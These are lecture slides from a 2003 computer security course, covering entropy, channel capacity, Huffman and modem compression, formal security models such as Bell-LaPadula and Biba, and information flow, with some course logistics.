• Channel properties
• Entropy
• Models
CS3235 - Hugh Anderson’s notes. Page number: 217
![Page 219: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/219.jpg)
Hugh’s bigger mistakes...
CS3235 - Hugh Anderson’s notes. Page number: 218
![Page 220: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/220.jpg)
Incorrect
0.20.333
1.0
f 3f 5f
The plot is frequency vs time . (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 219
![Page 221: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/221.jpg)
Correct
0.20.333
1.0
f 3f 5f
The plot is amplitude vs frequency . (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 220
![Page 222: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/222.jpg)
Incorrect
If we had a source emitting two symbols, 0 and 1, with prob-abilities of 1 and 0, then the entropy of the source is
H(X) =n∑
i=1
Pxilog2
1Pxi
= log2 1 + 0 ∗ log2 0
= 0 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 221
![Page 223: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/223.jpg)
Correct
If we had a source emitting two symbols, 0 and 1, with prob-abilities of 1 and 0, then the entropy of the source is
H(X) =
nXi=1
Pxi log21
Pxi
= 1 ∗ log2 1 + 0 ∗ log21
0
= 0 bits/symbol
Note thatlimy→0
y log21
y= 0
CS3235 - Hugh Anderson’s notes. Page number: 222
![Page 224: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/224.jpg)
Page 46 of notes
The first two equations that begin H(X) should begin withL(X).
L(X) =
nXi=1
Pxi • sizeof(xi)
=1
2∗ 3 +
1
4∗ 3 +
4
16∗ 3
= 1.5 + 0.75 + 0.75
= 3 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 223
![Page 225: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/225.jpg)
1/2 of data through correctly...
Received data is corrupted 50% of the time:
Before After
CS3235 - Hugh Anderson’s notes. Page number: 224
![Page 226: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/226.jpg)
Convolution
Applet to do convolution:http://www.cs.brown.edu/exploratories/freeSoftware/repository/edu/brown/cs/exploratories/
applets/convolution/convolution java browser.html
CS3235 - Hugh Anderson’s notes. Page number: 225
![Page 227: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/227.jpg)
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 226
![Page 228: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/228.jpg)
Shannon and Nyquist
ReceiverSourceInformation
TransmitterDestination
Channel
SourceNoise
(or sink)
Maximum BPS = W log2(1 + SN ) bits/sec
CS3235 - Hugh Anderson’s notes. Page number: 227
![Page 229: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/229.jpg)
Shannon and Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz,and a S/N of 30db (about 1024:1)
D = 3000 ∗ log2 1025
≈ 3000 ∗ 10
≈ 30000 bps
This is a typical maximum bit rate achievable over the tele-phone network.
CS3235 - Hugh Anderson’s notes. Page number: 228
![Page 230: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/230.jpg)
Nyquist
The maximum data rate over a limited bandwidth (W) chan-nel with V discrete levels is:
Maximum data rate = 2W log2 V bits/sec
For example, two-Level data cannot be transmitted overthe telephone network faster than 6,000 BPS, because thebandwidth of the telephone channel is only about 3,000Hz.
CS3235 - Hugh Anderson’s notes. Page number: 229
![Page 231: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/231.jpg)
Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz,and using 256 levels
D = 2 ∗ 3000 ∗ log2 256
= 6000 ∗ 8
= 48000 bps
In these equations, the assumption is that the relative en-tropies of the signal and noise are a maximum (that they arerandom).
CS3235 - Hugh Anderson’s notes. Page number: 230
![Page 232: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/232.jpg)
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 231
![Page 233: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/233.jpg)
Maximum entropy
In practical systems, signals rarely have maximum entropy,and we can do better - there may be methods to compressthe data2.
2Note: we must also differentiate between lossy and lossless compressionschemes. A signal with an entropy of 0.5 may not be compressed more than 2:1 un-less you use a lossy compression scheme. JPEG and Wavelet compression schemescan achieve huge data size reductions without visible impairment of images, but therestored images are not the same as the original ones - they just look the same. Thelossless compression schemes used in PkZip, gzip or GIF files (LZW) cannot achievecompression ratios as high as that found in JPEG.
CS3235 - Hugh Anderson’s notes. Page number: 232
![Page 234: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/234.jpg)
Huffman encoding
An immediate question of interest is “What is the minimumlength bit string that may be used to compress a string ofsymbols?”.
The Huffman encoding minimizes the bit length given thefrequency of occurence of each symbol3. The resultant bitstring in the best case will be the length predicted from thecalculation of the source entropy.
3Note that it presupposes knowledge about these frequencies.
CS3235 - Hugh Anderson’s notes. Page number: 233
![Page 235: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/235.jpg)
Huffman encoding
How can we get knowledge about the frequency of (say)the letters in the English language?
(answer) - we read snapple bottle tops...
CS3235 - Hugh Anderson’s notes. Page number: 234
![Page 236: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/236.jpg)
Huffman encoding
1
1
1
1
0 1
0
A O N S
T
0
0 0E
Less common characters use longer bit strings.
CS3235 - Hugh Anderson’s notes. Page number: 235
![Page 237: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/237.jpg)
Huffman encoding
Our algorithm for encoding is simple - we calculate the treeencoding knowing the frequency of each letter:
Symbol Coding
E 00
T 10
A 010
O 011
N 110
S 111
To decode, traverse the tree taking a left or right path ac-cording to the bit. The leaf has our symbol.
CS3235 - Hugh Anderson’s notes. Page number: 236
![Page 238: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/238.jpg)
Case study - MNP5 and V.42bis
MNP5 and V42.bis are compression schemes commonlyused on modems.
MNP5 suffers from the unfortunate property that it will ex-pand data with maximum or near-maximum entropy (in-stead of compression).
V42.bis does not have this property - it uses a large dictio-nary, and will not try to compress an already compressedstream.
CS3235 - Hugh Anderson’s notes. Page number: 237
![Page 239: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/239.jpg)
MNP5
MNP5 uses two different compression methods, switchingbetween them as appropriate. The methods are:
• Adaptive frequency encoding
• Run-length encoding
Run length encoding sends the bytes with a byte countvalue, and doubles the size of a data stream with maximumentropy.
CS3235 - Hugh Anderson’s notes. Page number: 238
![Page 240: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/240.jpg)
Adaptive frequency encoding
3-bit header Body size Total code size Number of codewords
000 1 bit 4 bits 2
001 1 bit 4 bits 2
010 2 bits 5 bits 4
011 3 bits 6 bits 8
100 4 bits 7 bits 16
101 5 bits 8 bits 32
110 6 bits 9 bits 64
111 7 bits 10 bits 128
34 of our codewords are larger than they would be if we didnot use this encoding scheme
CS3235 - Hugh Anderson’s notes. Page number: 239
![Page 241: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/241.jpg)
Further study
• Textbook Chapter 32
• Shannon’s paper on secrecy systems athttp://www.cs.ucla.edu/˜jkong/research/security/shannon.html.
CS3235 - Hugh Anderson’s notes. Page number: 240
![Page 242: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/242.jpg)
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 241
![Page 243: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/243.jpg)
Preliminaries - security models
Definition: a range of formal policies for specifying the se-curity of a system in terms of a (mathematical) model.
access control matrix
Bell-LaPadula
Biba
Clark-Wilson
CS3235 - Hugh Anderson’s notes. Page number: 242
![Page 244: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/244.jpg)
Security model
Have a model
Determine properties
Verify implementations
CS3235 - Hugh Anderson’s notes. Page number: 243
![Page 245: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/245.jpg)
Access control matrix
Rows of the matrix are subjects, columns are objects:
Objects
Subjects
f1 f2 f3 f4
s1 read
execute
execute
s2 write read execute
s3 read write execute
s4 read write read
s4 cannot read f1. But subjects may collude...
CS3235 - Hugh Anderson’s notes. Page number: 244
![Page 246: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/246.jpg)
Bell-LaPadula, confidentiality
Military style to assure confidentiality services.
Security levels in a (total) ordering formalizing a policywhich restricts information flow from a higher securitylevel to a lower security level.
Lower-level subjects from accessing higher-level objects.
Section 5.2 in textbook
CS3235 - Hugh Anderson’s notes. Page number: 245
![Page 247: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/247.jpg)
Bell-LaPadula, levels
1. Top secret (T )
2. Secret (S)
3. Confidential (C)
4. Unclassified (U )
where T > S > C > U . Access operations visualized usingan access control matrix, and are drawn from read , write .
CS3235 - Hugh Anderson’s notes. Page number: 246
![Page 248: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/248.jpg)
BLP security property
The clearance classification for a subject s ∈ S or objecto ∈ O is denoted L(s) = ls or L(o) = lo. We might thenassume we can use this to construct a first simple securityproperty:
• No read-up-1 : s can read o if and only if lo ≤ ls, and shas read access in the access control matrix.
This single property is insufficient to ensure the restrictionwe need for the security policy.
CS3235 - Hugh Anderson’s notes. Page number: 247
![Page 249: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/249.jpg)
BLP Trojan Horse property
Consider the case when a low security subject creates ahigh security object (say a program) which then reads a highsecurity file, copying it to a low security one. This behaviouris commonly called a Trojan Horse. A second property isneeded:
• No write-down-1 : s can write o if and only if ls ≤ lo, ands has write access in the access control matrix.
These two properties can be used to enforce our securitypolicy, but with a severe restriction. For example, how doesany subject write down without invalidating a security pol-icy?
CS3235 - Hugh Anderson’s notes. Page number: 248
![Page 250: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/250.jpg)
BLP extended
A security category c ∈ C is used to classify objects in themodel, with any object belonging to a set of categories.Each pair (l × c) is termed a security level, and forms alattice.
Lattice - chapter 30 in textbook
CS3235 - Hugh Anderson’s notes. Page number: 249
![Page 251: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/251.jpg)
BLP extended
We define a relation between security levels:
• The security level (l, c) dominates (l′, c′) (written(l, c) dom (l′, c′)) iff l′ ≤ l, and c′ ⊆ c.
A subject s and object o then belong to one of these securitylevels.
CS3235 - Hugh Anderson’s notes. Page number: 250
![Page 252: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/252.jpg)
BLP extended
The new properties are:
• No read-up-2: s can read o if and only if s dom o, and shas read access in the access control matrix.
• No write-down-2: s can write o if and only if o dom s,and s has write access in the access control matrix.
CS3235 - Hugh Anderson’s notes. Page number: 251
![Page 253: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/253.jpg)
BLP security
A system is considered secure in the current state if allthe current accesses are permitted by the two properties.
A transition from one state to the next is considered se-cure if it goes from one secure state to another securestate.
The basic security theorem stated in Theorem 5-2 in thetextbook states that if the initial state of a system is se-cure, and if all state transitions are secure, then the sys-tem will always be secure.
CS3235 - Hugh Anderson’s notes. Page number: 252
![Page 254: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/254.jpg)
BLP example
From textbook, p128:
DG UNIX uses access controls and BLP-like behaviour
CS3235 - Hugh Anderson’s notes. Page number: 253
![Page 255: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/255.jpg)
BLP limits
BLP is a static model, not providing techniques for changingaccess rights or security levels4, and there is an explorationand discussion into the limitations of this sort of securitymodelling in section 5.4 of the textbook.
However the model does demonstrate initial ideas into howto model, and how to build security systems that are prov-ably secure.
4You might want to explore the Harrison-Ruzo-Ullman model for this capability.
CS3235 - Hugh Anderson’s notes. Page number: 254
![Page 256: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/256.jpg)
Biba model, integrity
Trustworthiness of data and programs - assurance forintegrity services.
Levels like clean or dirty (in reference to database en-tries).
Biba model (chapter 6.2) is a kind of dual for Bell-LaPadula. integrity vs confidentiality.
CS3235 - Hugh Anderson’s notes. Page number: 255
![Page 257: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/257.jpg)
Biba levels
The integrity levels I are ordered as for the security lev-els
Function i : O → I (i : S → I) which returns the integritylevel of an object (subject).
CS3235 - Hugh Anderson’s notes. Page number: 256
![Page 258: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/258.jpg)
Biba properties
The properties/rules for the main (static) Biba model are:
• No read-down : s can read o iff i(s) ≤ i(o).
• No write-up : s can write o iff i(o) ≤ i(s).
• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
CS3235 - Hugh Anderson’s notes. Page number: 257
![Page 259: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/259.jpg)
Biba - dynamic
Biba models can also handle dynamic integrity levels, wherethe level of a subject reduces if it accesses an object ata lower level (in other words it has got dirty). The low-watermark policies are:
• No write-up : s can write o iff i(o) ≤ i(s).
• Subject lowers : if s reads o then i′(s) = min(i(s), i(o)).
• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
CS3235 - Hugh Anderson’s notes. Page number: 258
![Page 260: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/260.jpg)
Biba - ring
Finally, we have a ring policy,
• All read : s can read o regardless.
• No write-up : s can write o if and only if i(o) ≤ i(s).
• No invoke-up : s1 can execute s2 if and only if i(s2) ≤i(s1).
Each of these policies have an application in some area. -Example in textbook, p155 (LOCUS OS)
CS3235 - Hugh Anderson’s notes. Page number: 259
![Page 261: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/261.jpg)
Clark-Wilson, integrity
Transactions defined through certification rules.
The Clark-Wilson model has the following terminology:
Term Definition
CDI Constrained Data Item (data subject to control)
UDI UnconstrainedData Item (data not subject to control)
IVP Integrity Verification Procedures (for testing correct CDIs)
TP Transformation Procedures (for transforming the system)
CS3235 - Hugh Anderson’s notes. Page number: 260
![Page 262: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/262.jpg)
Chapter 6
Lecture 6 - Errors
CS3235 - Hugh Anderson’s notes. Page number: 261
![Page 263: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/263.jpg)
Assignment 1
Form your groups,
Select your project,
Email me with your proposal for approval
CS3235 - Hugh Anderson’s notes. Page number: 262
![Page 264: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/264.jpg)
Assignment 1
Literature review - not a survey :(
Formal paper - format in either word.zip, latex2e.zip inhttp://www.comp.nus.edu.sg/˜cs3235/2003-semesterI/
Heading, Author(s), abstract (?), Introduction, body ofpaper, Summary/Conclusion, References
10-50 pages, 5-50 references
CS3235 - Hugh Anderson’s notes. Page number: 263
![Page 265: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/265.jpg)
Assignment 2
More detailed, in-depth study
Not necessarily a software development project
Comparison, research, idea, program
CS3235 - Hugh Anderson’s notes. Page number: 264
![Page 266: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/266.jpg)
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to the lecture before...
CS3235 - Hugh Anderson’s notes. Page number: 265
![Page 267: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/267.jpg)
Last session
• Channel properties
• Entropy
• Models
CS3235 - Hugh Anderson’s notes. Page number: 266
![Page 268: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/268.jpg)
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
CS3235 - Hugh Anderson’s notes. Page number: 267
![Page 269: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/269.jpg)
Information flow (Chapter 16)
We may also more abstractly model some security poli-cies by considering the flow of information in a system.
We can use entropy to formalize this.
In this context, we can establish quantitative resultsabout information flow in a system, rather than just mak-ing absolute assertions5.
5For example, “System X reveals no more than 25% of the input values”.
CS3235 - Hugh Anderson’s notes. Page number: 268
![Page 270: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/270.jpg)
Information flow
In the textbook we have a definition of information flowbased on the conditional entropy H(x | y) of some x giveny:
Definition 16-1. The command sequence c causes a flowof information from x to y′ if H(x | y′) < H(x | y). If ydoes not exist in s then H(x | y) = H(x).
We can use this to detect implicit flows of information, notjust explicit ones in which we directly modify an object.
CS3235 - Hugh Anderson’s notes. Page number: 269
![Page 271: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/271.jpg)
Information flow
Consider the example on page 409 of the textbook:
if x=1 theny := 0
elsey := 1;
After this code segment, we can determine if x = 1 fromy′ even though we do not ever assign y′ directly from somefunction of x. In other words we have an implicit flow ofinformation from x to y′.
CS3235 - Hugh Anderson’s notes. Page number: 270
![Page 272: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/272.jpg)
Information flow
Formal treatment by considering the entropy of x. If thelikelihood of x = 1 is 0.5, then H(x) = 1. We can alsodeduce that H(x | y′) = 0, and so
H(x | y′) < H(x | y) = H(x) = 1
and information is flowing from x to y′. Paper gives somebackground.
CS3235 - Hugh Anderson’s notes. Page number: 271
![Page 273: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/273.jpg)
Confinement and covert channels
The confinement problem is one of preventing a systemfrom leaking (possibly partial) information.
